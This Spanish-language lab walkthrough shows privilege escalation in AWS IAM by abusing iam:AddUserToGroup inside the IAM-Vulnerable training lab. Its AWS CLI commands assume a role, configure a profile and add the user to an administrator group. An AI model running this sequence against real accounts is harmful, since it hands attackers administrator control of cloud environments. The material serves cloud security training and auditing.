AddUserToGroup

Un atacante con el permiso iam:AddUserToGroup puede utilizarlo para añadirse a un grupo IAM existente en la cuenta de AWS.

Luego del despliegue del laboratorio de IAM-Vulnerable, nos vamos a encontrar el siguiente usuario:

Este usuario tiene la siguiente política:

Este usuario tiene el siguiente rol:

Otra manera de validar lo anterior, es por medio del siguiente comando ya explicado:

Listando las políticas del usuario que será auditado:

aws iam list-attached-user-policies --user-name privesc13-AddUserToGroup-user

Obteniendo información relevante para nuestra auditoria utilizando el ARN de la política del usuario auditado:

aws iam get-policy-version --policy-arn arn:aws:iam::651927172911:policy/privesc13-AddUserToGroup --version-id v1

Ahora con nuestro usuario administrador, vamos a generar unas credenciales con STS sobre dicho usuario.

aws sts assume-role --role-arn arn:aws:iam::651927172911:role/privesc13-AddUserToGroup-role --role-session-name privesc13

Por lo anterior, tenemos que autenticarnos en AWSCLI y validar con el comando del El whoami de AWS

Primero nos autenticamos:

aws configure --profile privesc13

Y luego validamos con el whoami de AWS:

aws sts get-caller-identity --profile privesc13

Si intentamos agregarnos al grupo de administradores, vamos a obtener una salida vacía que indica que la adicción del usuario al grupo fue exitosa:

aws iam add-user-to-group --group-name Group-Root-Spartan --user-name privesc13-AddUserToGroup-user --profile privesc13

Si revisamos ahora podemos apreciar que el usuario inicial tiene privilegios de administrador:

Última actualización

¿Te fue útil?